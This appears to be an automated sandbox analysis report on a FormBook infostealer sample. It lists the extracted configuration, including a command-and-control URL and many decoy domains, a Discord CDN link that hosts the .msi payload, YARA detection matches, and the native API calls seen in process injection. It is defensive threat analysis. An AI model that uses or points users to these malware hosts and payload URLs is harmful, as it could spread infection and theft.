{"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]} |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://computername/printers/printername/.printer |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/ |
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: explorer.exe, 00000008.00000000.2107572712.0000000004F30000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://treyresearch.net |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/ |
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner |
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv. |
Source: msiexec.exe, 00000004.00000002.2097975295.0000000000330000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2098042878.00000000003BA000.00000004.00000020.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi |
Source: msiexec.exe, 00000004.00000002.2098087183.0000000000566000.00000004.00000001.sdmp, msiexec.exe, 00000004.00000002.2098074405.0000000000466000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qn |
Source: msiexec.exe, 00000004.00000002.2097965804.0000000000324000.00000004.00000040.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnG |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk, | 7_2_008F00C4 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0048 NtProtectVirtualMemory,LdrInitializeThunk, | 7_2_008F0048 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0078 NtResumeThread,LdrInitializeThunk, | 7_2_008F0078 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF9F0 NtClose,LdrInitializeThunk, | 7_2_008EF9F0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF900 NtReadFile,LdrInitializeThunk, | 7_2_008EF900 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, | 7_2_008EFAD0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFAE8 NtQueryInformationProcess,LdrInitializeThunk, | 7_2_008EFAE8 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFBB8 NtQueryInformationToken,LdrInitializeThunk, | 7_2_008EFBB8 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFB68 NtFreeVirtualMemory,LdrInitializeThunk, | 7_2_008EFB68 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC90 NtUnmapViewOfSection,LdrInitializeThunk, | 7_2_008EFC90 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC60 NtMapViewOfSection,LdrInitializeThunk, | 7_2_008EFC60 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFD8C NtDelayExecution,LdrInitializeThunk, | 7_2_008EFD8C |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFDC0 NtQuerySystemInformation,LdrInitializeThunk, | 7_2_008EFDC0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFEA0 NtReadVirtualMemory,LdrInitializeThunk, | 7_2_008EFEA0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 7_2_008EFED0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFFB4 NtCreateSection,LdrInitializeThunk, | 7_2_008EFFB4 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F10D0 NtOpenProcessToken, | 7_2_008F10D0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0060 NtQuerySection, | 7_2_008F0060 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F01D4 NtSetValueKey, | 7_2_008F01D4 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F010C NtOpenDirectoryObject, | 7_2_008F010C |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F1148 NtOpenThread, | 7_2_008F1148 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F07AC NtCreateMutant, | 7_2_008F07AC |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF8CC NtWaitForSingleObject, | 7_2_008EF8CC |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF938 NtWriteFile, | 7_2_008EF938 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F1930 NtSetContextThread, | 7_2_008F1930 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFAB8 NtQueryValueKey, | 7_2_008EFAB8 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFA20 NtQueryInformationFile, | 7_2_008EFA20 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFA50 NtEnumerateValueKey, | 7_2_008EFA50 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFBE8 NtQueryVirtualMemory, | 7_2_008EFBE8 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFB50 NtCreateKey, | 7_2_008EFB50 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC30 NtOpenProcess, | 7_2_008EFC30 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC48 NtSetInformationFile, | 7_2_008EFC48 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0C40 NtGetContextThread, | 7_2_008F0C40 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F1D80 NtSuspendThread, | 7_2_008F1D80 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFD5C NtEnumerateKey, | 7_2_008EFD5C |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFE24 NtWriteVirtualMemory, | 7_2_008EFE24 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFFFC NtCreateProcessEx, | 7_2_008EFFFC |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFF34 NtQueueApcThread, | 7_2_008EFF34 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F00C4 NtCreateFile,LdrInitializeThunk, | 9_2_021F00C4 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F07AC NtCreateMutant,LdrInitializeThunk, | 9_2_021F07AC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFAB8 NtQueryValueKey,LdrInitializeThunk, | 9_2_021EFAB8 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, | 9_2_021EFAD0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk, | 9_2_021EFAE8 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFB50 NtCreateKey,LdrInitializeThunk, | 9_2_021EFB50 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk, | 9_2_021EFB68 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk, | 9_2_021EFBB8 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF900 NtReadFile,LdrInitializeThunk, | 9_2_021EF900 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF9F0 NtClose,LdrInitializeThunk, | 9_2_021EF9F0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 9_2_021EFED0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFFB4 NtCreateSection,LdrInitializeThunk, | 9_2_021EFFB4 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk, | 9_2_021EFC60 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFD8C NtDelayExecution,LdrInitializeThunk, | 9_2_021EFD8C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk, | 9_2_021EFDC0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0048 NtProtectVirtualMemory, | 9_2_021F0048 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0078 NtResumeThread, | 9_2_021F0078 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0060 NtQuerySection, | 9_2_021F0060 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F10D0 NtOpenProcessToken, | 9_2_021F10D0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F010C NtOpenDirectoryObject, | 9_2_021F010C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F1148 NtOpenThread, | 9_2_021F1148 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F01D4 NtSetValueKey, | 9_2_021F01D4 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFA20 NtQueryInformationFile, | 9_2_021EFA20 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFA50 NtEnumerateValueKey, | 9_2_021EFA50 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFBE8 NtQueryVirtualMemory, | 9_2_021EFBE8 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF8CC NtWaitForSingleObject, | 9_2_021EF8CC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF938 NtWriteFile, | 9_2_021EF938 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F1930 NtSetContextThread, | 9_2_021F1930 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFE24 NtWriteVirtualMemory, | 9_2_021EFE24 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFEA0 NtReadVirtualMemory, | 9_2_021EFEA0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFF34 NtQueueApcThread, | 9_2_021EFF34 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFFFC NtCreateProcessEx, | 9_2_021EFFFC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC30 NtOpenProcess, | 9_2_021EFC30 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC48 NtSetInformationFile, | 9_2_021EFC48 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0C40 NtGetContextThread, | 9_2_021F0C40 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC90 NtUnmapViewOfSection, | 9_2_021EFC90 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFD5C NtEnumerateKey, | 9_2_021EFD5C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F1D80 NtSuspendThread, | 9_2_021F1D80 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099D50 NtCreateFile, | 9_2_00099D50 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099E00 NtReadFile, | 9_2_00099E00 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099E80 NtClose, | 9_2_00099E80 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099F30 NtAllocateVirtualMemory, | 9_2_00099F30 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099DFB NtReadFile, | 9_2_00099DFB |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099F2B NtAllocateVirtualMemory, | 9_2_00099F2B |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E93CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, | 9_2_024E93CE |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, | 9_2_024E9862 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E93D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, | 9_2_024E93D2 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E9DAE NtResumeThread,NtClose, | 9_2_024E9DAE |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FE0C6 | 7_2_008FE0C6 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0092D005 | 7_2_0092D005 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0091905A | 7_2_0091905A |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00903040 | 7_2_00903040 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FE2E9 | 7_2_008FE2E9 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009A1238 | 7_2_009A1238 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FF3CF | 7_2_008FF3CF |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009263DB | 7_2_009263DB |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00902305 | 7_2_00902305 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00907353 | 7_2_00907353 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0094A37B | 7_2_0094A37B |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00935485 | 7_2_00935485 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00911489 | 7_2_00911489 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0093D47D | 7_2_0093D47D |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0091C5F0 | 7_2_0091C5F0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090351F | 7_2_0090351F |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00904680 | 7_2_00904680 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090E6C1 | 7_2_0090E6C1 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009A2622 | 7_2_009A2622 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0098579A | 7_2_0098579A |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090C7BC | 7_2_0090C7BC |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009357C3 | 7_2_009357C3 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0099F8EE | 7_2_0099F8EE |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090C85C | 7_2_0090C85C |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0092286D | 7_2_0092286D |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009A098E | 7_2_009A098E |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009029B2 | 7_2_009029B2 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009169FE | 7_2_009169FE |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00985955 | 7_2_00985955 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009B3A83 | 7_2_009B3A83 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009ACBA4 | 7_2_009ACBA4 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0098DBDA | 7_2_0098DBDA |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FFBD7 | 7_2_008FFBD7 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00927B00 | 7_2_00927B00 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0099FDDD | 7_2_0099FDDD |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00930D3B | 7_2_00930D3B |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090CD5B | 7_2_0090CD5B |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00932E2F | 7_2_00932E2F |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0091EE4C | 7_2_0091EE4C |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00910F3F | 7_2_00910F3F |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0092DF7C | 7_2_0092DF7C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A1238 | 9_2_022A1238 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FE2E9 | 9_2_021FE2E9 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02202305 | 9_2_02202305 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0224A37B | 9_2_0224A37B |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02207353 | 9_2_02207353 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A63BF | 9_2_022A63BF |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FF3CF | 9_2_021FF3CF |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022263DB | 9_2_022263DB |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0222D005 | 9_2_0222D005 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02203040 | 9_2_02203040 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0221905A | 9_2_0221905A |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FE0C6 | 9_2_021FE0C6 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A2622 | 9_2_022A2622 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0224A634 | 9_2_0224A634 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02204680 | 9_2_02204680 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220E6C1 | 9_2_0220E6C1 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220C7BC | 9_2_0220C7BC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0228579A | 9_2_0228579A |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022357C3 | 9_2_022357C3 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0223D47D | 9_2_0223D47D |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02235485 | 9_2_02235485 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02211489 | 9_2_02211489 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220351F | 9_2_0220351F |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02246540 | 9_2_02246540 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0221C5F0 | 9_2_0221C5F0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022B3A83 | 9_2_022B3A83 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02227B00 | 9_2_02227B00 |
